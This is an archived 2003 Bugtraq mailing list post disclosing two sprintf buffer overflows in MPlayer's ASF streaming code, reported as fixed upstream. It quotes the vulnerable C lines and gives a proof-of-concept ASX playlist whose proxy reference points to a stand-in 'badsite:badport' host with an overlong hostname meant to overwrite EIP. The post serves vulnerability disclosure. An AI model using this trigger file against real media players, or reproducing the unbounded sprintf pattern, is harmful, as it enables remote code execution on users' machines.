lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <2CEBCAF96F65D411858800508BDFDC6CD0D8B8@USPLM250.txpln.us.eds.com>
Date: Thu, 25 Sep 2003 19:17:49 -0500
From: "Otero, Hernan" <hernan.otero@....com>
To: "'bugtraq@...urityfocus.com'" <bugtraq@...urityfocus.com>
Subject: Mplayer Buffer Overflow



Favorite Linux Player Buffer Overflow
 

 Product:  Mplayer
 Developers:  http://www.mplayerhq.hu
 OS:    Port to All *NIX and Win32
 Remote Exploitable:  YES

Developers has been contacted, problem was fixed, recomended update your
mplayer version.

 In the source tree there is a file called asf_streaming.c this file has a
function named asf_http_request, that function has two buffer overflows,
this overflows are in the sprintf lines.
 
 
 asf_http_request {
 		char str[250];
 		....
 		...
 		..
 		sprintf( str, "Host: %s:%d", server_url->hostname,
 server_url->port );     
 		....
 		...	
 		..
 		sprintf( str, "Host: %s:%d", url->hostname, url->port );
 
 		....
 		...
 		..
 }

 
  
 This, at a first look, may look as it can´t be exploited ( because the
MAXHOSTLEN size restriction )... but if in an ASX file like this with a
"badsite" listening in "badport" send "\n\n" as answer you could lead to a
fully controllable EIP buffer overflow
 
 
 <asx version = "3.0">
 <title>Bas Site ASX</title>
 
 <moreinfo href = "mailto:info@...site.com
 <mailto:info@...site.com> " />
 <logo href = "http://www.badsite.com/streaming/grupo.gif
 <http://www.badsite.com/streaming/grupo.gif> " style="ICON" />
 <banner href= "images/bannermitre.gif">
 <abstract>Bad Site live</abstract>
 <moreinfo target="_blank" href = "http://www.badsite.com/
 <http://www.badsite.com/> " />
 </banner>
 
 <entry>
 <title>NEWS</title>
 <AUTHOR>NEWS</AUTHOR>
 <COPYRIGHT>© All by the news</COPYRIGHT>
 <ref href =
"http_proxy://badsite:badport/http://aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaa"/>
 <logo href = "http://www.badsite.com/streaming/grupo.gif
 <http://badsite.com/streaming/grupo.gif> " style="ICON" />
 </entry>
 </asx>
 


 Regards,
 
   Hernán Otero
   hernan.otero@....com 


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ